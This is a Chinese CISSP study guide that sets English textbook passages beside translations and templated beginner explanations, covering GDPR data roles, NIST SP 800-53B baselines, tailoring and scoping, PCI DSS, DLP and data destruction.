或其他机构,其仅代表数据控制者处理个人数据。 ” 例如,雇用单位为支付工资而收集员工个人信息的,属于数据控制者。 如果他 们将此信息传递给第三方公司处理工资,则该工资公司为数据处理者。 在此示 例中,工资公司(数据处理者)必须仅在数据控制者的指示下,将数据用于处 理工资,不得用于其他任何目的。 《通用数据保护条例》(GDPR)限制将数据传输至欧盟以外的国家。 违反 GDPR隐私规定的公司可能面临高达其全球收入4%或2000万欧元的罚款,以 较高者为准。 不幸的是,GDPR充斥着法律术语,为组织带来了诸多挑战。 例 如,第107条包含如下单句陈述: 因此,除非满足本条例中关于传输至第三国或国际组织的适当保障措施 (包括具有约束力的公司规则)以及特定情况下的例外规定,否则应禁止 将个人数据传输至该第三国或国际组织。 因此,许多组织设立了专门的职位,例如数据保护官(DPO),以监督数据控 制并确保组织遵守所有相关法律法规。 GDPR强制要求任何必须遵守GDPR的组 织任命一名数据保护官。 该职位人员负责确保组织应用相关法律以保护个人的 隐私数据。 数据保管人 数据所有者通常会将日常任务委托给一个数据保管人。

保管人通过确保数据得 到妥善存储和保护,来帮助维护数据的完整性和安全性。 例如,保管人会遵循 备份策略中的指南确保数据被备份。 如果管理员已对数据配置了审计功能,保 管人还会维护这些日志。 在实践中,IT部门内的人员或系统安全管理员通常是数据的保管者。 他们 可能是负责为数据分配权限的同一组管理员。 用户与主体

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

审计:审计记录主体行为,用于追责、复盘和取证。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

数据保管者:数据保管者按所有者要求实施备份、访问控制等保护。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

没有日志和身份绑定,就很难问责。

Owner 定规则,Custodian 执行保护。

Custodian 常是 IT/运维角色。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
审计 审计记录主体行为,用于追责、复盘和取证。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
数据保管者 数据保管者按所有者要求实施备份、访问控制等保护。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
学习单元 36 / PDF P359

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

A user is any person who accesses data via a computing system to accomplish work tasks. Users should have access only to the data they need to perform their work tasks. You can also think of users as employees or end users. The GDPR defines a data subject as a person who can be identified through an identifier, such as a name, an identification number, location data, an online identifier, or other means. As an example, if a file includes PII on Sally Smith, Sally Smith is the data subject. Using Security Baselines Once an organization has identified and classified its assets, it will typically want to secure them. That's where security baselines come in.

Baselines provide a starting point and ensure a minimum security standard. One common baseline that organizations use is imaging. Chapter 16 covers system imaging in the context of configuration management in more depth. As an introduction, administrators configure a single system with desired settings, capture it as an image, and then deploy the image to other systems. This ensures that systems are deployed in a similar secure state, which helps to protect the privacy of data. After deploying systems in a secure state, auditing processes periodically check the systems to ensure they remain in a secure state.

For example, Microsoft Group Policy can periodically check systems and reapply settings to match the security baseline. NIST SP 800-53, Rev. 5—Security and Privacy Controls for Information Systems and Organizations mentions security control baseline and identifies it as the set of minimum security controls defined for an information system. It stresses that a single set of security controls does not apply to all situations. Still, any organization can select a set of baseline security controls and tailor the baseline to its needs.

NIST SP 800-53B—Control Baselines for Information Systems and Organizations includes a comprehensive list of security controls and has identified many of them to include in various baselines. Specifically, they present three security control baselines (determined by the impact level of the system) and a privacy control baseline. These are based on the potential impact to an organization's mission if there is a loss of confidentiality, integrity, or availability of a system. The baselines are as follows:

中文直译 / 整理

用户是指通过计算系统访问数据以完成工作任务的任何人。 用户应仅能访问其 执行工作任务所需的数据。 您也可以将用户视为员工或最终用户。 GDPR将数据主体定义为可以通过标识符(如姓名、身份证号、位置数据、在 线标识符或其他手段)被识别的个人。 例如,如果一个文件包含Sally Smith的 PII信息,那么Sally Smith就是数据主体。 使用安全基线 一旦组织识别并分类了其资产,通常就会希望保护这些资产。 这时就需要安全 基线。 基线提供了一个起点,并确保最低的安全标准。 组织常用的一种基线是 镜像。 第16章在配置管理的背景下更深入地介绍了系统镜像。 作为入门,管理 员会配置一个具有所需设置的单一系统,将其捕获为镜像,然后将该镜像部署 到其他系统。 这确保了系统以相似的安全状态部署,有助于保护数据的隐私。 在将系统以安全状态部署后,审计过程会定期检查系统,以确保其保持安全状 态。 例如,Microsoft组策略可以定期检查系统并重新应用设置,以符合安全 基线。 NIST SP 800‑53,第5版——信息系统的安全与隐私控制提到安全控制基线,并 将其定义为针对信息系统所定义的最低安全控制集。

它强调,单一的安全控制 集并不适用于所有情况。 然而,任何组织都可以选择一组基线安全控制,并根 据自身需求对其进行定制。 NIST SP 800‑53B——信息系统的控制基线包含了 一份全面的安全控制列表,并已确定其中许多控制项应纳入各种基线中。 具体 而言,它们提出了三种安全控制基线(根据系统的影响级别确定)和一种隐私 控制基线。 这些基线基于系统机密性、完整性或可用性丧失对组织使命可能造 成的影响程度。 这些基线如下:

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 37 / PDF P360

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Low-Impact System Controls in this baseline are recommended if any loss of confidentiality, integrity, and/or availability will have a low impact on the organization's mission. Moderate-Impact System Controls in this baseline are recommended if it is possible that a loss of confidentiality, integrity, or availability will have a moderate impact on the organization's mission. High-Impact System Controls in this baseline are recommended if it is possible that a loss of confidentiality, integrity, or availability will have a high impact on the organization's mission. Privacy Control Baseline This baseline provides an initial baseline for any systems that process PII.

Organizations may combine this baseline with one of the other baselines. These refer to the worst-case potential impact if a system is compromised and a data breach occurs. For example, imagine a system is compromised. You would try to predict the impact of the compromise on the confidentiality, integrity, or availability of the system and any data it holds: If the compromise would cause privacy data to be compromised, you would consider adding the security controls identified as privacy control baseline items to your baseline. If the impact is low for all three of the security objectives, you would consider adding the security controls identified as low-impact controls to your baseline.

If the impact of this compromise is moderate for any one of the security objectives, you would consider adding the security controls identified as moderate-impact, in addition to the low-impact controls. If the impact is high for any one of the security objectives, you would consider adding all the controls listed as high-impact in addition to the low-impact and moderate-impact controls. It's worth noting that many of the items in these lists are basic security practices. Additionally, implementing basic security principles such as the least privilege principle shouldn't surprise anyone. Of course, just because these are basic security practices, it doesn't mean organizations implement them.

Unfortunately, many organizations have yet to discover or enforce the basics.

中文直译 / 整理

低影响系统 此基线中的控制项适用于任何机密性、完整性或可用性丧失对组织 使命造成低影响的情况。 中等影响系统如果机密性、完整性或可用性的丧失可能对组织的使命造成中等 影响,则建议采用此基线中的控制措施。 高影响系统如果机密性、完整性或可用性的丧失可能对组织的使命造成重大影响, 则建议采用此基线中的控制措施。 隐私控制基线此基线为任何处理个人身份信息(PII)的系统提供初始基线。 组 织可将此基线与其他基线之一结合使用。 这些指的是系统被入侵且发生数据泄露时可能造成的最坏情况影响。 例如,假 设系统被入侵,您需要评估该入侵对系统及其所持数据的机密性、完整性或可 用性可能造成的影响: 如果入侵导致隐私数据泄露,您应考虑将被标识为隐私控制基线项的安全 控制措施添加到您的基线中。 如果所有三个安全目标的影响均为低,则您应考虑将被标识为低影响控制 措施的安全控制添加到您的基线中。 如果此妥协对任一安全目标的影响为中等,则除了低影响控制措施外,您 还应考虑添加被标识为中等影响的安全控制措施。 如果此妥协对任一安全目标的影响为高,则除了低影响和中等影响控制 措施外,您还应考虑添加所有被标识为高影响的控制措施。

值得注意的是,这些列表中的许多项目都是基本的安全实践。 此外,实施诸如 最小权限原则等基本安全原则不应让人感到意外。 当然,尽管这些是基本的安 全实践,但这并不意味着组织会实施它们。 不幸的是,许多组织尚未发现或执 行这些基本措施。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

身份:身份是主体在系统中的标识。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
身份 身份是主体在系统中的标识。
学习单元 38 / PDF P361

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Comparing Tailoring and Scoping After selecting a control baseline, organizations fine-tune it with tailoring and scoping processes. A big part of the tailoring process is aligning the controls with an organization's specific security requirements. As a comparison, think of a clothes tailor who alters or repairs clothes. If a person buys a suit at a high-end retailer, a tailor modifies the suit to fit the person perfectly. Similarly, tailoring a baseline ensures it is a good fit for the organization. Tailoring refers to modifying the list of security controls within a baseline to align with the organization's mission.

NIST SP 800-53B formally defines it as “part of an organization-wide risk management process that includes framing, assessing, responding to, and monitoring information security and privacy risks” and indicates it includes the following activities: Identifying and designating common controls Applying scoping considerations Selecting compensating controls Assigning values to organization-defined control parameters via explicit assignment and selection operations Supplementing baselines with additional controls and control enhancements Providing specification information for control implementation A selected baseline may not include commonly implemented controls.

However, just because a security control isn't included in the baseline doesn't mean it should be removed. For example, imagine that a data center includes video cameras covering the external entry, the internal exit, and every row of servers, but the baseline only recommends a video camera cover the external entry. During the tailoring process, personnel will evaluate these extra cameras and determine if they are needed. They may decide to remove some to save costs or keep them. An organization might decide that a set of baseline controls applies perfectly to computers in their central location but that some controls aren't appropriate or feasible in a remote office location.

In this situation, the organization can select compensating security controls to tailor the baseline to the remote site. For example, imagine the account lockout policy is set to

中文直译 / 整理

定制与范围界定的比较 在选择控制基线后,组织通过定制和范围界定过程对其进行微调。 定制过程的 重要部分是将控制措施与组织的具体安全需求对齐。 作为比较,可以想象一位 裁缝修改或修补衣物。 如果一个人在高端零售商购买了一套西装,裁缝会修改 西装以使其完美贴合穿着者。 同样,定制基线可确保其与组织的需求高度契合。 定制是指修改基线中的安全控制列表,以与组织的使命保持一致。 NIST SP 800‑53B 将其正式定义为“组织范围风险管理工作的一部分,包括框架构建、 评估、应对和监控信息安全与隐私风险”,并指出其包括以下活动: 识别和指定通用控制 应用范围界定考虑因素 选择补偿性控制 通过显式分配和选择操作为组织定义的控制参数赋值 通过附加控制措施和控制增强来补充基线 提供控制实施的规范信息 所选基线可能不包含通常实施的控制措施。 然而,仅仅因为某个安全控制未包 含在基线中,并不意味着应将其移除。 例如,假设一个数据中心配备了摄像头, 覆盖了外部入口、内部出口以及每一排服务器,但基线仅建议在外部入口安装 摄像头。 在定制过程中,人员将评估这些额外的摄像头,并确定它们是否必要。 他们可能会决定移除部分摄像头以节省成本,或保留它们。

一个组织可能会决定,一组基线控制措施完全适用于其中心位置的计算机,但 某些控制措施在远程办公室位置并不合适或不可行。 在这种情况下,组织可以 选择补偿性安全控制措施,以将基线调整为适应远程站点。 例如,假设账户锁 定策略设置为

小白解释

场景先行:你是公司的安全负责人,正在读第 361 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
学习单元 39 / PDF P362

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

lock out users if they enter an incorrect password five times. In this example, the control value is 5, but the tailoring process may change it to 3. Scoping is a part of the tailoring process and refers to reviewing a list of baseline security and privacy controls and selecting only those security and privacy controls that apply to the IT systems you're trying to protect. Or, in the simplest terms, scoping processes eliminate controls that are recommended in a baseline. For example, if a system doesn't allow any two people to log on to it simultaneously, there's no need to apply a concurrent session control.

During this part of the tailoring process, the organization looks at every control in the baseline and vigorously defends (in writing) any decision to omit a control from the baseline. Standards Selection When selecting security controls within a baseline, or otherwise, organizations need to ensure that the controls comply with external security standards. External elements typically define compulsory requirements for an organization. For example, the Payment Card Industry Data Security Standard (PCI DSS) defines requirements that businesses must follow to process major credit cards.

Similarly, organizations that collect or process data belonging to EU citizens must abide by the requirements in the GDPR. Obviously, not all organizations have to comply with these standards. Organizations that don't store, process, or transmit payment card transactions do not need to comply with PCI DSS. Similarly, organizations that do not collect or process EU citizens' data do not need to comply with GDPR requirements. Organizations need to identify the standards that apply and ensure that the security and privacy controls they select fully comply with those standards.

Even if your organization isn't legally required to comply with a specific standard, using a well-designed community standard can be helpful. For example, U.S. government organizations are required to comply with many of the standards published by NIST SP 800 documents. These same documents are used by many organizations in the private sector to help them develop and implement their own security standards. Summary

中文直译 / 整理

如果用户输入错误密码五次,则锁定账户。 在此示例中,控制值为5,但调整过程 可能将其更改为3。 范围界定是定制过程的一部分,指审查一组基线安全和隐私控制措施,并仅选 择适用于您要保护的IT系统的那些安全和隐私控制措施。 或者用最简单的术语 来说,范围界定过程会剔除基线中推荐的控制措施。 例如,如果一个系统不允 许任何两个人同时登录,则无需应用并发会话控制。 在定制过程的这一部分中, 组织会审视基线中的每一项控制措施,并以书面形式坚决辩护任何从基线中省 略控制措施的决定。 标准选择 当selectin g securit y controls within a baseline , or otherwise 因此,组织需要确保控制措施符合外部安全标准。 外部要素通常为组织规 定强制性要求。 例如,支付卡行业数据安全标准(PCI DSS)规定了企业处理 主要信用卡时必须遵守的要求。 同样,收集或处理欧盟公民数据的组织必须遵 守GDPR的要求。 显然,并非所有组织都必须遵守这些标准。 不存储、处理或传输支付卡交易的 组织无需遵守PCI DSS。 同样,不收集或处理欧盟公民数据的组织也无需遵守 GDPR的要求。

组织需要识别适用的标准,并确保其选择的安全与隐私控制措 施完全符合这些标准。 即使您的组织在法律上没有义务遵守特定标准,采用设计良好的社区标准也可 能有所帮助。 例如,美国政府机构必须遵守NIST SP 800系列文件发布的许多 标准。 这些同一份文件也被私营部门的许多组织用于帮助制定和实施其自身的 安全标准。 摘要

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 40 / PDF P363

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

Asset security focuses on collecting, handling, and protecting information throughout its life cycle. This includes sensitive information stored or processed on computing systems or transferred over a network and the assets used in these processes. Sensitive information is any information that an organization keeps private and can include multiple levels of classifications. Proper destruction methods ensure that data can't be retrieved after destruction. Data protection methods include digital rights management (DRM) and using cloud access security brokers (CASBs) when using cloud resources. DRM methods attempt to protect copyrighted materials.

A CASB is software placed logically between users and cloud-based resources. It can ensure that cloud resources have the same protections as resources within a network. Entities that must comply with the EU GDPR use additional data protection methods such as pseudonymization, tokenization, and anonymization. Personnel can fulfill many different roles when handling data. Data owners are ultimately responsible for classifying, labeling, and protecting data. System owners are responsible for the systems that process the data. The GDPR defines data controllers, data processors, and data custodians.

Data controllers decide what data to process, the purpose of data collection, and how to process it. A data controller can hire a third party to process data, and in this context, the third party is the data processor. Data processors have a responsibility to protect the privacy of the data and not use it for any purpose other than directed by the data controller. A custodian is delegated day-to-day responsibilities for properly storing and protecting data. Security baselines provide a set of security controls that an organization can implement as a secure starting point. Some publications (such as NIST SP 800-53B) identify security control baselines.

However, these baselines don't apply equally to all organizations. Instead, organizations use scoping and tailoring techniques to identify the security controls to implement after selecting baselines. Additionally, organizations ensure that they implement security controls mandated by external standards that apply to their organization. Study Essentials Understand the importance of data and asset classifications. Data owners are responsible for defining data and asset classifications and ensuring that data and systems are properly tagged. Additionally, data owners

中文直译 / 整理

资产安全侧重于在整个生命周期中收集、处理和保护信息。 这包括存储或处理 在计算系统上的敏感信息、通过网络传输的信息,以及用于这些过程的资产。 敏感信息是指组织保持私密的任何信息,可能包含多个级别的分类。 适当的销 毁方法可确保数据在销毁后无法被恢复。 数据保护方法包括数字版权管理(DRM)以及在使用云资源时使用云访问安全 代理(CASB)。 DRM 方法旨在保护受版权保护的材料。 CASB 是一种逻辑上 部署在用户与云资源之间的软件,可确保云资源具备与网络内资源相同的保护 措施。 必须遵守欧盟 GDPR 的实体会采用额外的数据保护方法,例如假名化、 标记化和匿名化。 人员在处理数据时可以承担多种不同角色。 数据所有者最终负责对数据进行分 类、标记和保护。 系统所有者负责处理数据的系统。 GDPR 定义了数据控制者、 数据处理者和数据保管者。 数据控制者决定要处理哪些数据、数据收集的目的 以及如何处理数据。 数据控制者可以聘请第三方处理数据,在这种情况下,该 第三方即为数据处理者。 数据处理者有责任保护数据的隐私,并不得将数据用 于数据控制者所指示之外的任何目的。 保管者被赋予日常职责,负责妥善存储 和保护数据。

安全基线提供了一组安全控制措施,组织可以将其作为安全起点来实施。 某些 出版物(如 NIST SP 800‑53B)会识别安全控制基线。 然而,这些基线并不 适用于所有组织。 相反,组织在选择基线后,使用范围界定和定制技术来确定 需实施的安全控制措施。 此外,组织还需确保实施适用于其自身的外部标准所 要求的安全控制措施。 学习要点 了解数据和资产分类的重要性。 数据所有者负责定义数据和资产分类,并确保 数据和系统得到正确标记。 此外,数据所有者

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

数据保管者:数据保管者按所有者要求实施备份、访问控制等保护。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

Custodian 常是 IT/运维角色。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
数据保管者 数据保管者按所有者要求实施备份、访问控制等保护。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 41 / PDF P364

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

define requirements to protect data at different classifications, such as encrypting sensitive data at rest, in transit, and in use. Data classifications are typically defined within security policies or data policies. Define PII and PHI. Personally identifiable information (PII) is any information that can identify an individual. Protected health information (PHI) is any health-related information that can be related to a specific person and is subject to HIPAA. Many laws and regulations mandate the protection of PII and PHI. Know how to manage sensitive information.

Sensitive information is any type of classified information, and proper management helps prevent unauthorized disclosure resulting in a loss of confidentiality. Proper management includes tagging, handling, storing, and destroying sensitive information. The two areas where organizations often miss the mark are adequately protecting backup media holding sensitive information and sanitizing media or equipment when it is at the end of its life cycle. Describe the three data states. The three data states are at rest, in transit, and in use. Data at rest is any data stored on media such as hard drives or external media. Data in transit is any data transmitted over a network.

Encryption methods protect data at rest and in transit. Data in use refers to data in memory and used by an application. Applications should flush memory buffers to remove data after it is no longer needed. Define DLP. Data loss prevention (DLP) solutions detect and block data exfiltration attempts by scanning unencrypted files and looking for keywords and data patterns. Network DLP solutions (including cloud DLP solutions) scan files before they leave the network. Endpoint DLP solutions prevent users from copying or printing some files. Compare data destruction methods. Erasing a file doesn't delete it. Clearing media overwrites it with characters or bits.

Purging repeats the clearing process multiple times and removes data so that the media can be reused. Degaussing removes data from tapes and magnetic hard disk drives, but it does not affect optical media or SSDs. Destruction methods include incineration, shredding, and disintegration, pulverizing, and melting. Describe data remanence. Data remanence is the data that remains on media after it should have been removed. Hard disk drives sometimes retain residual magnetic flux that can be read with advanced tools. Advanced tools can read slack space on a disk, which is unused space in clusters. Erasing data on a disk leaves data remanence. For solid-state drives (SSDs), data

中文直译 / 整理

定义保护不同分类数据的要求,例如对静态、传输中和使用中的敏感数据进行 加密。 数据分类通常在安全策略或数据策略中定义。 定义PII和PHI。 个人身份信息(PII)是指任何能够识别个人的信息。 受保 护的健康信息(PHI)是指任何与特定个人相关且受HIPAA监管的健康相关 信息。 许多法律法规要求保护PII和PHI。 了解如何管理敏感信息。 敏感信息是指任何类型的机密信息,妥善管理有助于防 止未经授权的披露导致机密性丧失。 妥善管理包括标记、处理、存储和销毁敏感 信息。 组织常未能妥善处理的两个领域是:充分保护包含敏感信息的备份介质, 以及在设备生命周期结束时对介质或设备进行净化。 描述三种数据状态。 三种数据状态为静态、传输中和使用中。 静态数据是指 存储在硬盘或外部介质等媒介上的任何数据。 传输中的数据是指通过网络传 输的任何数据。 加密方法用于保护静态和传输中的数据。 使用中的数据是指 存在于内存中并被应用程序使用的数据。 应用程序应在数据不再需要后清除 内存缓冲区以移除数据。 定义DLP。 数据丢失防护(DLP)解决方案通过扫描未加密的文件并查找关键 词和数据模式来检测并阻止数据外泄行为。

网络DLP解决方案(包括云DLP解 决方案)在文件离开网络前对其进行扫描。 终端DLP解决方案防止用户复制或 打印某些文件。 比较数据销毁方法。 删除文件并不会真正删除它。 清除媒体是用字符或比特覆 盖它。 净化会多次重复清除过程,彻底移除数据,使媒体可重复使用。 消磁可 移除磁带和磁性硬盘驱动器中的数据,但不影响光盘介质或SSD。 销毁方法包 括焚烧、粉碎、分解、研磨和熔化。 描述数据残留。 数据残留是指在本应被清除后仍保留在介质上的数据。 硬盘驱 动器有时会保留残余的磁通量,这些磁通量可通过高级工具读取。 高级工具可 以读取磁盘上的空闲空间,即簇中未使用的空间。 擦除磁盘上的数据仍会留下 数据残留。 对于固态驱动器(SSD),数据

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

